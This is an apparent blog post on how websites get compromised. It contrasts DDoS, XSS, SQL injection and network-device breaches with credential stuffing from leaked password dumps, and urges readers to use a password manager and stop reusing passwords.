There has been a considerable amount of "hacking" lately going on. Sites going down, content being stolen, DDoS being leveraged.
There has been a considerable amount of “hacking” lately going on. Sites going down, content being stolen, DDoS being leveraged.
So while there are various methods of “hacking” a site I think there is one thing that ties all of this insanity together.
Sure, you can DDoS a site right out of existence – but that’s not really hacking. If you think that hacking a site is the same thing as flooding it with bad traffic until the server or pipe chokes… you clearly don’t understand the way that hacking or attack/defense actually works.
Layer 7 Breach
One of the more popular ways of hacking a site is by finding a flaw in the website such as via XSS (Cross-Site Scripting) or SQL Injection… flaws which almost all sites contain if you look hard enough.
These types of hacks involve either injecting or extracting bits of information from the site’s database(s)… if you’re simply extracting data you want to do things like steal email addresses, passwords, personal details, credit cards or various other important things that are of financial value to criminals.
If you’re injecting data, you’re typically putting something onto the site such as a script that will change the function of the site… the most common goal is to inject a Trojan which will attack and compromise the client.
In either case the object is to be stealth and make as little noise as possible until you’ve gotten what you needed and are long, long gone.
These types of breaches are becoming less and less common but still happen. A router with a wide open enable password allows for someone to jump on and monitor traffic, mirror some data and who knows… you’ve been compromise.
With the myriad of network devices today from load balancers to firewalls to switches and routers – hardware OR software-based – it’s not really uncommon to find at least one device that has open or at least easily breakable access to it.
Servers aren’t getting broken into as much directly either – since the legacy method of attack used to be to find a buffer overflow in the web server, execute the attack and hope the machine (a) doesn’t crash and (b) has all the right memory addresses and processor architecture, etc in place to execute the attack. Too hard, too much work, too easy to detect.
Why go through all that trouble, why devise attacks, craft packets and attempt exploits when you can simply download an database of 1.3Million username/password pairs from the latest compromise (Gawker media) via BitTorrent… and then try all those passwords against thousands of sites world-wide?
I’m 100% serious here… password re-use is rabid, and people often use the same username/password pairs for their banking/credit card sites, throw-away promotional sites they’ll never come back to, and things like Facebook -all the same password and username pairs.
So is this really hacking? Nope, it’s 100x simpler, less messy, and a lot more rewarding… and sadly it’s happening right now.
Sadly, today it’s still down to passwords on websites. Get a password management system that synchronizes between your phone [handset] and your computer, or just your mobile device by itself.
Get something that’s encrypted reasonably well, can generate passwords on the fly and can store them in a way that you can remember to retrieve them when you need them in a hurry.
Otherwise, when the next site that gets compromised happens and their username/password combinations are all over the BitTorrents… you will be left wondering – Just how many sites did I re-use that username/password combination on?